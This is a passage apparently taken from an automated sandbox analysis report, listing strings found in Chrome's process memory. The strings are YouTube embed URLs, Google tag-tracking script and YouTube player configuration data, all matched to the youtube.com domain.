\",\"width\":320,\"height\":180},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEcCNACELwBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLBYvhTEjWfX6lqGhUNGtBQ3N68E6Q\",\"width\":336,\"height\":188},{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/hqdefault.webp\",\"width\":480,\"height\":360}]},\"playButton\":{\"buttonRenderer\":{\"style\":\"STYLE_DEFAULT\",\"size\":\"SIZE_DEFAULT\",\"isDisabled\":false,\"navigationEndpoint\":{\"clickTrackingParams\":\"CAkQ8FsiEwiMl_WcrbeNAxWsT0wIHTChJmY\u003d\",\"watchEndpoint\":{\"videoId\":\"gobWGqPjLSQ\"}},\"accessibility\":{\"label\":\"Play Science of THRIVE Approach
                                  Source: chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC08030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Eu();dp(function(){a();ap(b)||ln(a,b)},b)},Eu=function(){return[L.m.V,L.m.W]},Fu=/^(?:www\.)?google(?:\.com?)?(?:\.[a-z]{2}t?)?$/,Gu=/^www\.googleadservices\.com$/,Ku=/^gad_source[_=](\d+)$/;function Pu(){return lp("dedupe_gclid",function(){return cs()})};var Qu=/^(www\.)?google(\.com?)?(\.[a-z]{2}t?)?$/,Ru=/^www.googleadservices.com$/;function Su(a){a||(a=Tu());return a.cq?!1:a.Zo||a.ap||a.ep||a.bp||a.Qf||a.Mo||a.cp||a.Ro?!0:!1}function Tu(){var a={},b=Is(!0);a.cq=!!b._up;var c=cu();a.Zo=c.aw!==void 0;a.ap=c.dc!==void 0;a.ep=c.wbraid!==void 0;a.bp=c.gbraid!==void 0;a.cp=c.gclsrc==="aw.ds";a.Qf=Cu().Qf;var d=y.referrer?Dk(Jk(y.referrer),"host"):"";a.Ro=Qu.test(d);a.Mo=Ru.test(d);return a};function Uu(a){var b=window,c=b.webkit;delete b.webkit;a(b.webkit);b.webkit=c}function Vu(a){var b={action:"gcl_setup"};if("CWVWebViewMessage"in a.messageHandlers)return a.messageHandlers.CWVWebViewMessage.postMessage({command:"awb",payload:b}),!0;var c=a.messageHandlers.awb;return c?(c.postMessage(b),!0):!1};function Wu(){return["ad_storage","ad_user_data"]}function Xu(a){if(E(38)&&!bo(Xn.xl)&&"webkit"in window&&window.webkit.messageHandlers){var b=function(){try{Uu(function(c){c&&("CWVWebViewMessage"in c.messageHandlers||"awb"in c.messageHandlers)&&(ao(Xn.xl,function(d){d.gclid&&gu(d.gclid,a)}),Vu(c)||O(178))})}catch(c){O(177)}};kn(function(){Gt(Wu())?b():ln(b,Wu())},Wu())}};var Yu=["https://www.google.com","https://www.youtube.com","https://m.youtube.com"]; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: H l.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false},\"rk\",\"mk\"],[[[[\"c\"],[null,1],[null,0],[\"O43z0dpjhgX20SCx4KAo\"],[\"CLEn\"]],[null,825.6999999999825]]]],[\"/client_streamz/bg/po/csc\",null,[\"cs\",\"mk\"],[[[[null,2],[\"CLEn\"]],[1]]]],[\"/client_streamz/bg/po/ctav\",null,[\"av\",\"mk\"],[[[[\"m\"],[\"CLEn\"]],[1]]]]]]",null,null,null,null,null,null,14400,null,null,null,null,null,1]],"1747926392080"] equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = 